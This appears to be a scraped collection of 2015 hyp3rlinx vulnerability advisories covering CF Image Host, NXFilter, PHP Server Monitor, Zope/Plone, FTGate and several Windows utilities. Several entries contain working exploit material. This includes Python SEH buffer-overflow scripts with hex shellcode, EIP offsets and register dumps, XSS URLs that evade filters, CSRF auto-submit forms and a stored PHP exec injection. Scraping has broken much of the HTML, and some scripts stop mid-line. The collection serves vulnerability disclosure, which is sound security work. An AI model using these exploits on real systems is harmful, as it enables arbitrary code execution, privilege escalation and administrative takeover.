exec("c:\Windows\system32\calc.exe");'';';'; OR inject CMD to launch chrome.exe etc... ';echo exec("c:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe");'';'; After, click on some tabs above like 'Database' or 'Ban User' and Tada! this will execute our stored PHP command... either running calc.exe or launching Google Chrome. Disclosure Timeline: = Vendor Notification: NA November 13, 2015 : Public Disclosure Exploitation Technique: === Local / Remote Severity Level: High Description: Request Method(s):[+] POST Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6 Vulnerable Parameter(s): [+] 'Site Title', 'Site Slogan' etc.. Affected Area(s): [+] OS [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
CF Image Host CSRF
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt Vendor: codefuture.co.uk/projects/imagehost Product: === CF Image Host 1.65 - 1.6.6 Archive download listed as: version 1.65 unzips as imagehost 1.6.6 Vulnerability Type: = Cross site request forgery - CSRF CVE Reference: == N/A Vulnerability Details: = No CSRF protection exists allowing attackers to make requests to the server on behalf of the victim if they are logged in and visit a malicious site or click an infected linx. This will let attackers modify certain web application settings to whatever the attacker wishes. CSRF Exploit code(s): http://localhost/imagehost1.6.6/admin.php?act=set;> http://hyp3rlinx.altervista.org; /> document.getElementById('HELL').submit() Disclosure Timeline: = Vendor Notification: NA November 14, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: High Description: Request Method(s):[+] POST Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6 [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Microsoft .NET Framework XSS / Elevation of Privilege CVE-2015-6099
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MICROSOFT-XSS-ELEVATION-OF-PRIVILEGE.txt Vendor: == www.microsoft.com Product: === Microsoft .NET Framework Vulnerability Type: XSS / Elevation of Privilege CVE Reference: == CVE-2015-6099 Vulnerability Details: == Microsoft .NET Framework is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. .NET Elevation of Privilege Vulnerability - CVE-2015-6099 An elevation of privilege vulnerability exists when ASP.NET improperly validates values in HTTP requests, exposing users to a potential cross-site scripting (XSS) attack. An attacker who successfully exploited the vulnerability could leverage a vulnerable website to inject client-side script into a users browser and ultimately modify or spoof content, conduct phishing activities, disclose information, or perform any action on the vulnerable website that the target user has permission to perform. To exploit this vulnerability, user interaction is required. In a web-browsing scenario a user would have to navigate to a compromised website. In an email attack scenario an attacker would have to convince a user who is logged on to a vulnerable server to click a specially crafted link in an email. The update addresses the vulnerability by modifying how ASP.NET validates the value of an HTTP request. Microsoft received information about the vulnerability through coordinated vulnerability disclosure. At the time this security bulletin was originally issued, Microsoft was unaware of any attack attempting to exploit this vulnerability. Microsoft has not identified any mitigating factors for this vulnerability. Microsoft has not identified any workarounds for this vulnerability. The following workarounds may be helpful in your situation: Remove requestPathInvalidCharacters key from web.config In order to work around this issue, administrators can remove the non-default setting from web.config, or at least include : in the requestPathInvalidCharacters setting. How to undo the workaround: Restore the previously removed line. https://technet.microsoft.com/library/security/MS15-118 http://www.symantec.com/security_response/vulnerability.jsp?bid=77479_rssid=sr-advisories http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6099 Disclosure Timeline: Vendor Notification: August 15, 2015 November 10, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: === High Description: Request Method(s): [+] GET / POST Vulnerable Product versions: Microsoft .NET Framework 4.0 Microsoft .NET Framework 4.5 Microsoft .NET Framework 4.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft Windows 10 for 32-bit Systems Microsoft Windows 10 for x64-based Systems Microsoft Windows 10 version 1511 for 32-bit Systems Microsoft Windows 10 version 1511 for x64-based Systems Microsoft Windows 7 for 32-bit Systems SP1 Microsoft Windows 7 for x64-based Systems SP1 Microsoft Windows 8 for x64-based Systems Microsoft Windows 8.1 for 32-bit Systems Microsoft Windows 8.1 for x64-based Systems Microsoft Windows RT Microsoft Windows RT 8.1 Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 Microsoft Windows Server 2008 R2 for x64-based Systems SP1 Microsoft Windows Server 2008 for 32-bit Systems SP2 Microsoft Windows Server 2008 for Itanium-based Systems SP2 Microsoft Windows Server 2008 for x64-based Systems SP2 Microsoft Windows Server 2012 Microsoft Windows Server 2012 R2 Microsoft Windows Vista SP2 Microsoft Windows Vista x64 Edition SP2 === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
NXFilter v3.0.3 CSRF
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-CSRF.txt Vendor: www.nxfilter.org/p2/ Product: NXFilter v3.0.3 Vulnerability Type: = Cross site request forgery - CSRF CVE Reference: == N/A Vulnerability Details: = No CSRF protections exist allowing us to make malicious HTTP requests on behalf of our victim. The Server will then happily process any of the following actions if our victim clicks our infected linx or visits our malicious website while currently logged in to the vulnerable application. 1) "add arbitrary users" 2) "add or change SMTP settings" 3) "add arbitrary redirect domains" 4) "add arbitrary zone transfers" 5) "delete zone transfer domains" Exploit code(s): === function doit(){ var e=document.getElementById('HELL') e.submit() } 1) CSRF add arbitrary users http://localhost/user,user.jsp; method="post"> < and some persistent XSS! 2) CSRF add or change SMTP notification alerts http://localhost/config,alert.jsp; method="post"> 3) CSRF add arbitrary redirect domain http://localhost/config,redirection.jsp; method="post"> 4) CSRF add arbitrary zone transfers http://localhost/config,zone_transfer.jsp; method="post"> 5) CSRF delete zone transfer domains http://localhost/config,zone_transfer.jsp?action_flag=delete=1 Disclosure Timeline: == Vendor Notification: October 18, 2015 November 5, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: === High Description: == Request Method(s): [+] GET / POST Vulnerable Product: [+] NXFilter v3.0.3 === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
NXFilter v3.0.3 Persistent / Reflected XSS
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-XSS.txt Vendor: www.nxfilter.org/p2/ Product: NXFilter v3.0.3 Vulnerability Type: = Persistent & Reflected XSS CVE Reference: == N/A Vulnerability Details: = Persistent & reflected XSS entry points exist allowing arbitrary client side browser code execution on victims who click our infected linx or visit persistently stored XSS payloads. XSS strings seem to get filtered, yet we can defeat that using JS String.fromCharCode() functions. Exploit code(s): === 1) persistent XSS under category / custom "name" parameter is vulnerable to persistent XSS injection using POST method. http://localhost/category,custom.jsp 2) reflected XSS http://localhost/classifier,ruleset.jsp?action_flag==1=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E 3) reflected XSS http://localhost/report,daily.jsp?stime=2015%2F10%2F17_option=yesterday=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2872%29%2bString.fromCharCode%2869%29%2bString.fromCharCode%2876%29%2bString.fromCharCode%2876%29%29%3C/script%3E Disclosure Timeline: === Vendor Notification: October 18, 2015 November 5, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: === High Description: == Request Method(s): [+] GET / POST Vulnerable Product: [+] NXFilter v3.0.3 Vulnerable Parameter(s):[+] name, user, kw === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
TCPing 2.1.0 Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt Vendor: Spetnik.com Product: = Spetnik TCPing 2.1.0 / tcping.exe circa 2007 TCPing "pings" a server on a specific port using TCP/IP by opening and closing a connection on the specified port. Results are returned in a similar fashion to that of Microsoft Windows Ping. This application is intended for use in testing for open ports on remote machines, or as an alternative to the standard "ping" in a case where ICMP packets are blocked or ignored. Vulnerability Type: === Buffer Overflow CVE Reference: == N/A Vulnerability Details: = If TCPing is called with an specially crafted CL argument we will cause exception and overwrite the Pointers to next SEH record and SEH handler with our buffer and malicious shellcode. No suitable POP POP RET address is avail in TCPing as they start with null bytes 0x00 and will break our shellcode. However, TCPing is not compiled with SafeSEH which is a linker option, so we can grab an address from another module that performs POP POP RET instructions to acheive arbitrary code execution on victims system. stack dump... EAX 0045 ECX 0040A750 tcping.0040A750 EDX 41414141 EBX 02CC ESP 0018FA50 EBP 0018FA50 ESI 0018FD21 ASCII "rror: Unknown host AA EDI 0018FCC8 EIP 0040270A tcping.0040270A C 0 ES 002B 32bit 0() P 1 CS 0023 32bit 0() A 1 SS 002B 32bit 0() Z 0 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr WSANO_DATA (2AFC) EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G) WinDBG dump... (17a8.149c): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for image0040 *** ERROR: Module load completed but symbols could not be loaded for image0040 eax=0045 ebx=0222 ecx=0040a750 edx=41414141 esi=0018fd21 edi=0018fcc8 eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 image0040+0x270a: 0040270a 8802mov byte ptr [edx],al ds:002b:41414141=?? Exploit code(s): === Python script... import struct,os,subprocess #Spetnik TCPing Utility 2.1.0 #buffer overflow SEH exploit #by hyp3rlinx #pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") vulnpgm="C:\\tcping.exe " nseh="\xEB\x06"+"\x90"*2 #JMP TO OUR SHELLCODE seh=struct.pack('
PHP Server Monitor 3.1.1 Privilege Escalation
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt Vendor: www.phpservermonitor.org sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download Product: PHP Server Monitor 3.1.1 Vulnerability Type: = Privilege Escalation / CSRF Vulnerability Details: = PHP Server Monitor uses level 20 for basic user and level 10 for Admins these are stored in Database. Basic users can elevate thier privileges to that of Administrator by crafting an HTTP payload changing their level to '10' then getting an Administrator to click an infected link or visit a malicious website to launch an CSRF attack which will grant the user admin access. This problem is due to no CSRF protection mechanism in place. Exploit code(s): === 1) privilege escalation / CSRF function doit(){ var e=document.getElementById('HELL') e.submit() } http://localhost/phpservermon-3.1.1/?=user=save=3; method="post"> Exploitation Technique: === Remote Disclosure Timeline: = Vendor Notification: NA Oct 30, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] POST Vulnerable Product: [+] PHP Server Monitor 3.1.1 === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
PHP Server Monitor 3.1.1 CSRF
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt Vendor: www.phpservermonitor.org sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download Product: PHP Server Monitor 3.1.1 Vulnerability Type: = Cross site request forgery (CSRF) Vulnerability Details: = Multiple CSRF issues in PHP Server Monitor allow remote attackers to add arbitrary users & servers to the system, modify system configurations and delete arbitrary servers, if user (admin) is logged in and visits our malicious website or clicks on our infected linxs. As no CRSF protection is used in the application, we can make request on the victims behalf an the server will happily oblige processing our malicous HTTP requests. Exploit code(s): === function doit(){ var e=document.getElementById('HELL') e.submit() } 1) add arbitrary users to the system: http://localhost/phpservermon-3.1.1/?=user=save=0; method="post"> 2) add arbitrary servers to the system: http://localhost/phpservermon-3.1.1/?=server=save=0_to=; method="post"> 3) modify system configuration: http://localhost/phpservermon-3.1.1/index.php?mod=config=save; method="post"> 4) arbitrary server deletion via GET request: http://localhost/sectest/phpservermon-3.1.1/?=server=delete=2 Exploitation Technique: === Remote Severity Level: = High Disclosure Timeline: = Vendor Notification: NA Oct 30, 2015 : Public Disclosure Description: == Request Method(s): [+] GET / POST Vulnerable Product: [+] PHP Server Monitor 3.1.1 === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Blat.exe v2.7.6 SMTP / NNTP Mailer Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt Vendor: www.blat.net http://sourceforge.net/projects/blat/ Product: Blat v2.7.6 blat.exe is a Win32 is a command line eMail tool that sends eMail using SMTP or post to usenet using NNTP. Vulnerability Type: = Stack Buffer Overflow CVE Reference: == N/A Vulnerability Details: = An older release of blat.exe v2.7.6 is prone to a stack based buffer overflow when sending malicious command line arguments, we need to send two arguments first can be whatever e.g. "" then second argument to trigger the buffer overflow and execute arbitrary code on the victims OS. Stack dump... EAX 0826 ECX 0018E828 ASCII "Blat saw and processed these options, and was confused by the last one... AAA... EDX 0008E3C8 EBX 00E1 ESP 0018F05C ASCII "A... EBP 41414141 ESI 00426E88 blat.00426E88 EDI 00272FD8 EIP 41414141 <-- BOOM! C 0 ES 002B 32bit 0() P 1 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 1 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_SUCCESS () EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) Exploit code(s): === Python script to exploit... import struct,os,subprocess #pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") vulnpgm="C:\\blat276\\full\\blat.exe " eip=struct.pack('
AdobeWorkgroupHelper Stack Based Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt Vendor: www.adobe.com Product: = AdobeWorkgroupHelper.exe v2.8.3.3 Part of Photoshop 7.0 circa 2002 Vulnerability Type: === Stack Based Buffer Overflow CVE Reference: == N/A Vulnerability Details: = AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup functionality, that lets users work with files on a server that is registered as a workgroup. If AdobeWorkgroupHelper.exe is called with an overly long command line argument it is vulnerable to a stack based buffer overflow exploit. Resluting in arbitrary code execution undermining the integrity of the program. We can control EIP register at about 5,856 bytes, our shellcode will point to ECX register. Tested successfully on Windows 7 SP1 Exploit code(s): === Use below python script to exploit... import struct,os,subprocess #Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit #Tested Windows 7 SP1 # #by hyp3rlinx - apparition...@gmail.com #hyp3rlinx.altervista.org #== # #0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll] #ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3 #(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll) #=== ''' Quick Register dump... EAX 00270938 ECX 00270A7C <---BOOM! EDX 00A515FC ASCII "AA..." EBX 41414140 ESP 0018FEB0 EBP 0018FED0 ESI EDI 41414141 EIP 004585C8 AdobeWor.004585C8 C 0 ES 002B 32bit 0() P 0 CS 0023 32bit 0() A 0 SS 002B 32bit 0() Z 0 DS 002B 32bit 0() S 0 FS 0053 32bit 7EFDD000(FFF) T 0 GS 002B 32bit 0() D 0 O 0 LastErr ERROR_SUCCESS () EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G) ''' #shellcode to pop calc.exe Windows 7 SP1 sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") vulnpgm="C:\Program Files (x86)\Common Files\Adobe\Workflow\AdobeWorkgroupHelper.exe " #payload="A"*5852+"R"*4 #< control EIP register #our shellcode will point at ECX register, so we need to find an JMP or CALL ECX and point EIP to that address #where our malicious code resides, we find it in ARM.dll eip=struct.pack('
Zope Management Interface CSRF vulnerabilities
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ZOPE-CSRF.txt Vendor: www.zope.org plone.org Product: Zope Management Interface 4.3.7 Zope is a Python-based application server for building secure and highly scalable web applications. Plone Is a Content Management System built on top of the open source application server Zope and the accompanying Content Management Framework. Vulnerability Type: === Cross site request forgery (CSRF) Multiple CSRF (cross-site request forgery) vulnerabilities in the ZMI (Zope Management Interface). Patches to Zope and Plone for multiple CSRF issues. https://plone.org/security/20151006/multiple-csrf-vulnerabilities-in-zope https://plone.org/products/plone/security/advisories/security-vulnerability-20151006-csrf CVE Reference: == NA Vulnerability Details: = Security vulnerability: 20151006 - CSRF ZMI is mostly unprotected from CSRF vulnerabilities. Versions affected 4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.2, 4.3.1, 4.3, 4.2.7, 4.2.6, 4.2.5, 4.2.4, 4.2.3, 4.2.2, 4.2.1, 4.2 4.1.6, 4.1.5, 4.1.4, 4.1.3, 4.1.2, 4.1.1, 4.1, 4.0.9, 4.0.7, 4.0.5, 4.0.4, 4.0.3, 4.0.2, 4.0.1, 4.0, 3.3.6 3.3.5, 3.3.4. 3.3.3, 3.3.2, 3.3.1, 3.3 All versions of Plone prior to 5.x are vulnerable. Fixed by Nathan Van Gheem, of the Plone Security Team Coordinated by Plone Security Team patch was released and is available from https://pypi.python.org/pypi/plone4.csrffixes Exploit code(s): === Plone CSRF Add Linxs & Persistent XSS function doit(){ var e=document.getElementById('HELL') e.submit() } http://localhost:8080/Plone/Members/portal_factory/Link/link.2015-08-30.66/atct_edit;> http://hyp3rlinx.altervista.org; size="30" maxlength="511" placeholder="" /> 2) CSRF to Persistent XSS - Zope Management Interface ++ Persistent XSS via CSRF on title change properties tab, this will execute on each Zope page accessed by users. CSRF to Persistent XSS POC Code: = http://localhost:8080/; method="post"> Disclosure Timeline: = Vulnerability reported: 2015-08-30 Hotfix released: 2015-10-06 Exploitation Technique: === Remote Vector NETWORK Complexity LOW Authentication NONE Confidentiality NONE Integrity PARTIAL AvailabilityPARTIAL Severity Level: = 6.4 MEDIUM Description: == Request Method(s): [+] POST Vulnerable Product: [+] Zope Management Interface & all versions of Plone prior to 5.x are vulnerable. === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
LanWhoIs.exe 1.0.1.120 Stack Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-LANWHOIS-BUFFER-OVERFLOW-10062015.txt Vendor: www.lantricks.com Product: LanWhoIs.exe 1.0.1.120 LanWhoIs querys and returns domain (site) holder or IP address informations. Vulnerability Type: === Buffer Overflow CVE Reference: == N/A Vulnerability Details: == LanWhoIs contains a file parsing stack buffer overflow vulnerability. The program has a whois_result.xml XML file located under the LanWhoIs directory. This file holds results returned from program queries. e.g. 216.239.37.99 whois.arin.net 02.01.2005 16:17:30 -1 We can exploit the program by injecting malicious payload into the node of the local XML file causing buffer overflow overwriting both pointers to the NSEH & SEH exception handlers & control EIP at about 676 bytes. e.g. A.shellcode...etc.. WinDbg stack dump (2048.17cc): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** WARNING: Unable to verify checksum for image0040 *** ERROR: Module load completed but symbols could not be loaded for image0040 eax=02bdfec8 ebx=02bdff14 ecx=02bdfecc edx=41414141 esi= edi= eip=00404bc8 esp=02bdfc04 ebp=02bdfecc iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 image0040+0x4bc8: 00404bc8 8b4af8 mov ecx,dword ptr [edx-8] ds:002b:41414139= 0:011> !exchain 02bdfed4: 52525252 Invalid exception stack at 42424242 registers... EAX ECX 52525252 EDX 7714B4AD ntdll.7714B4AD EBX ESP 04D0F668 EBP 04D0F688 ESI EDI EIP 52525252 POC code: == Run below script, then copy and insert POC payload into XML node and run the application. Next, select the address in the Results window pane and then click Query button to run a whois lookup or use the 'F3' keyboard cmd to execute and KABOOOM!!! file=open("C:\\Program Files (x86)\\LanTricks\LanWhoIs\\HELL","w") payload="A"*676+""+"" <#KABOOM!!! file.write(payload) file.close() Public Disclosure: === October 6, 2015 Exploitation Technique: === Local Tested on Windows 7 SP1 Vulnerable Parameter: == QueryString === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
LanSpy 2.0.0.155 Buffer Overflow
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt Vendor: www.lantricks.com Product: LanSpy.exe LanSpy is network security and port scanner, which allows getting different information about computer: Domain and NetBios names, MAC address, Server information, Domain and Domain controller etc Vulnerability Type: === Buffer Overflow CVE Reference: == N/A Vulnerability Details: == LanSpy.exe uses an 'addresses.txt' plain text file which lives under the main LanSpy directory the file is used to load scanned IPs or URLs e.g. 127.0.0.1 replace addresses.txt file with our malicious one, the buffer overflow payload must be the very first entry in the text file. Next, run LanSpy.exe and click green arrow or use keyboard press 'F3' to start. Then KABOOM!... program crashez and we will control EIP at 684 bytes also overwrite both the NSEH & SEH exception handler pointers... Quick stack dump... (1274.19c4): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx= esi= edi= eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:001> g (1274.19c4): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax= ebx= ecx=52525252 edx=7714b4ad esi= edi= eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 52525252 ?? ??? 0:001> !exchain 0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad) 0264fe8c: 52525252 Invalid exception stack at 42424242 POC code(s): = import os #LanSpy.exe buffer overflow POC #by hyp3rlinx #hyp3rlinx.altervista.org #= #LanSpy.exe uses an 'addresses.txt' text file #which lives under the LanSpy directory #the addresses.txt file is used to load scanned IPs or URLs #control EIP at 684 bytes... also overwrite #both the NSEH & SEH exception handler pointers #--- payload="A"*684+""+""#<--- KABOOM! file=open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w") file.write(payload) file.close() Public Disclosure: === October 5, 2015 Exploitation Technique: === Local === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
FTGate 2009 Build 6.4.00 CSRF Vulnerabilities
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt Vendor: www.ftgate.com Product: FTGate 2009 SR3 May 13 2010 Build 6.4.00 Vulnerability Type: = Cross site request forgery (CSRF) CVE Reference: == N/A Vulnerability Details: = Multiple CSRF vectors exist within FTGate 2009 that allow us to add arbitrary remote domains, disable antivirus scanning for various Email file attachment types, and finally change settings to have archived server logs sent to our remote attacker controlled server for safe keeping. Exploit code(s): === CSRF(s): function invertedcross(){ var e=document.getElementById('PUNKSNOTDEAD') e.submit() } 1) add arbitrary domains: - http://localhost:8089/webadmin/mailboxes/index.fts?action=save; method="post"> 2) sends archived logs to arbitrary remote server: -- http://localhost:8089/webadmin/config/archive.fts?action=save; method="post"> 3) disable virus scan for .jar or .exe files etc: - Options to control handling of virus scanning for email attachments Virus Scanning Mode Operating mode of the virus scanner mode=0 to Disable Virus Scanning. http://localhost:8089/webadmin/filters/virus.fts; method="post"> Disclosure Timeline: = Vendor Notification: September 29, 2015 October 1, 2015 : Public Disclosure Exploitation Technique: === Remote Severity Level: = High Description: == Request Method(s): [+] POST Vulnerable Product: [+] FTGate 2009 SR3 May 13 2010 Build 6.4.00 Vulnerable Parameter(s):[+] domadd, extarcserver & mode === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
Git-1.9.5 ssh-agent.exe Buffer Overflow
